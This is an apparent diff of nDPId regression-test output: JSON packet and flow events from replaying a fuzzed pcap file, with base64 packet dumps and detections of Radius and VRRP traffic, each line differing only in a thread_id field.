01297{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"AAAMB6xAABRPqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 01283{"packet_event_id":1,"packet_event_name":"packet","packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"AAAMB6xAABRPqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476267} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":155,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476267}
00621{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"ABRP+4rqcNuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 00607{"packet_event_id":1,"packet_event_name":"packet","packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":239,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":239,"pkt_l4_len":0,"thread_ts_msec":1528997404349,"pkt":"ABRP+4rqcNuqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476466} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":156,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":43690,"global_ts_msec":1528997476466}
00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1528997476761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997476761,"pkt":"AAAMB6xAABRP+4rqCABFAALHIQ9AAP8RAAAKDEAexuIlAHIQBxQCswAAAVkCqxzt3wAE2R1LMmmDUD0Gdm8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwJQAAADghDQM3N0xbIqZkATUwMzExNDgwMjUwODY0NjI4QHdsYW4uVm6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1528997476761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997476761,"pkt":"AAAMB6xAABRP+4rqCABFAALHIQ9AAP8RAAAKDEAexuIlAHIQBxQCswAAAVkCqxzt3wAE2R1LMmmDUD0Gdm8aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwJQAAADghDQM3N0xbIqZkATUwMzExNDgwMjUwODY0NjI4QHdsYW4uVm6qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997476761,"flow_last_seen":1528997476761,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528997476761,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.37.0","src_port":29200,"dst_port":1812,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -198,8 +198,8 @@
00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"flow_datalink":1,"flow_max_packets":3}
01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1528997632285,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997632285,"pkt":"AAAMu6xAABRP+4rqCABFAALHIRFAAP9wAAAKDEAexuIZNXIQBxQCswAAAVsCq00mnArJWXX+N3JhhZON0ToaCgBDV8gOBFVTGgwAAFfIDQZ3aWZpGg8ACFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqcAATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxNS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNSkeJTZjLaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1528997632285,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":725,"pkt_l4_len":691,"thread_ts_msec":1528997632285,"pkt":"AAAMu6xAABRP+4rqCABFAALHIRFAAP9wAAAKDEAexuIZNXIQBxQCswAAAVsCq00mnArJWXX+N3JhhZON0ToaCgBDV8gOBFVTGgwAAFfIDQZ3aWZpGg8ACFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqcAATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxNS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TMDAtNTYtY2QtNmQtNDItNSkeJTZjLaqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}} 00623{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":161,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997632285,"flow_last_seen":1528997632285,"flow_idle_time":600000,"flow_min_l4_payload_len":691,"flow_max_l4_payload_len":691,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":691,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","l4_proto":112,"ndpi": {"confidence": {"4":"DPI"},"proto":"VRRP","breed":"Acceptable","category":"Network"}}
00729{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17664,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997632285,"pkt":"ABRP+4rqcNuYVcUnRQBFAAEwA2FAAPwRUBrG4hk1CgxAHgcUchABHGYCAlsBFPJGkwRL+pjdA5197qGahcwaCwAAV8gbBVNQQxpuAAABNxA06\/sNxTnxG6ukTqwhWbbA2iqJ9xUQWB4T5BwZI+vaxI+7bs\/vfw\/eMzQ3J3YR5Fh5RZWRNDm4c5zmNtk9aBmMKxf9+K7wySD8NYXouGgH0g5FMhfbrMBBWqKOxwRMjh\/pBwtArUnjATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNmZmLzAwOjU2OmNkOjZkOjQyOjU5LzIyNyUAMjAxMjU0NDIzNRIJU3Vj42VzcxkFU1BDTwYDAgAEUBLN9Y5G45qq3LYn60raic1U"} 00715{"packet_event_id":1,"packet_event_name":"packet","packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":17664,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528997632285,"pkt":"ABRP+4rqcNuYVcUnRQBFAAEwA2FAAPwRUBrG4hk1CgxAHgcUchABHGYCAlsBFPJGkwRL+pjdA5197qGahcwaCwAAV8gbBVNQQxpuAAABNxA06\/sNxTnxG6ukTqwhWbbA2iqJ9xUQWB4T5BwZI+vaxI+7bs\/vfw\/eMzQ3J3YR5Fh5RZWRNDm4c5zmNtk9aBmMKxf9+K7wySD8NYXouGgH0g5FMhfbrMBBWqKOxwRMjh\/pBwtArUnjATUwMzExNDgwMjUwODY0NjI4QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNmZmLzAwOjU2OmNkOjZkOjQyOjU5LzIyNyUAMjAxMjU0NDIzNRIJU3Vj42VzcxkFU1BDTwYDAgAEUBLN9Y5G45qq3LYn60raic1U"}
00214{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17664,"global_ts_msec":1528997632478} 00200{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":162,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":17664,"global_ts_msec":1528997632478}
00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997403593,"flow_last_seen":1528997403593,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.110","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997399308,"flow_last_seen":1528997399308,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.37.0","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":163,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997311323,"flow_last_seen":1528997311323,"flow_idle_time":180000,"flow_min_l4_payload_len":703,"flow_max_l4_payload_len":703,"flow_tot_l4_payload_len":703,"flow_avg_l4_payload_len":703,"midstream":0,"thread_ts_msec":1528997632285,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.224.25.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -211,8 +211,8 @@
